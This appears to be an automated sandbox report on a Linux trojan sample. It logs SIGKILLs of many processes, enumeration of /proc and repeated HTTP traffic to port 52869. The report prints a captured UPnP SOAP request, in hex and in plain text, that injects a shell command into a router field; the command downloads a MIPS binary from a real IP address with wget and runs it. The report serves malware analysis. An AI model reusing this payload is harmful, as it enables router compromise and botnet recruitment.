Source: KHSQ48GkGn, 5238.1.00000000114beee1.000000004c983291.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

Posts data to webserver

Source: unknown

HTTP traffic detected: POST /picdesc.xml HTTP/1.1Host: 127.0.0.1:52869Content-Length: 630Accept-Encoding: gzip, deflateSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMappingAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Connection: keep-aliveData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6e 69 67 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 33 37 2e 30 2e 39 2e 32 30 32 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 20 2d 4f 20 6e 69 67 3b 20 63 68 6d 6f 64 20 37 37 37 20 6e 69 67 3b 20 2e 2f 6e 69 67 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://37.0.9.202/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></

System Summary:

Sample tries to kill many processes (SIGKILL)

Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 936, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 5240, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 720, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 759, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 788, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 800, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 847, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 884, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 1334, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 1335, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 1860, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 1872, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 2096, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 2097, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 2102, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 2180, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 2191, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 2208, result: successful			Jump to behavior

Sample has stripped symbol table

Source: ELF static info symbol of initial sample

.symtab present: no

Sample tries to kill a process (SIGKILL)

Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 936, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 5240, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 720, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 759, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 788, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 800, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 847, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 884, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 1334, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 1335, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 1860, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 1872, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 2096, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 2097, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 2102, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 2180, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 2191, result: successful			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	SIGKILL sent: pid: 2208, result: successful			Jump to behavior

Classification label

Source: classification engine

Classification label: mal76.spre.troj.lin@0/2@0/0

Found detection on Joe Sandbox Cloud Basic with higher score

Source: KHSQ48GkGn

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Persistence and Installation Behavior:

Enumerates processes within the "proc" file system

Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/2033/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/2033/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1582/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1582/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/2275/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1612/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1612/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1579/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1579/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1699/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1699/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1335/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1335/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1698/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1698/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/2028/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/2028/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1334/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1334/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1576/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1576/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/2302/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/3236/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/2025/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/2025/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/2146/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/2146/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/910/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/912/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/912/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/912/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/759/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/759/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/759/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/517/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/2307/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/918/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/918/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/918/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1594/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1594/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/2285/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/2281/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1349/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1349/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1623/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1623/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/761/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/761/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/761/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1622/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1622/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/884/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/884/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/884/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1983/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1983/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/2038/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/2038/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1586/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1586/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1465/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1465/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1344/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1344/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1860/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1860/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1463/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1463/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/2156/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/2156/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/800/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/800/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/800/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/801/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/801/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/801/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1629/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1629/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1627/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1627/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1900/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1900/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/5042/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/491/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/491/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/491/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/2294/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/2050/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/2050/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1877/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1877/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/772/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/772/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/772/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1633/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1633/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1599/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1599/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1632/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1632/exe			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1477/fd			Jump to behavior
Source: /tmp/KHSQ48GkGn (PID: 5246)	File opened: /proc/1477/exe			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 45302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36880 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36826 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36884 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 36826
Source: unknown	Network traffic detected: HTTP traffic on port 36830 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 36830
Source: unknown	Network traffic detected: HTTP traffic on port 45302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48406 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40722 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48406 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40722 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48406 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40722 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40756 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53786 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 53786
Source: unknown	Network traffic detected: HTTP traffic on port 53236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48406 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40722 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46498 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44066 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58024 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44070 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58024 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58024 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35802 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45302 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58022 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54360 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58028 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54364 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52892 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 58024 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49010 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60496 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33212 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53236 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52892 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53420 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53424 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58024 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60496 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57752 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37590 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59666 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35314 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52892 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 56652 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52918 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52928 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37586 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46228 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46234 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49012 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60496 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35314 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42650 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56678 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44934 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58024 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44938 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48406 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40722 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54844 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42296 -> 52869
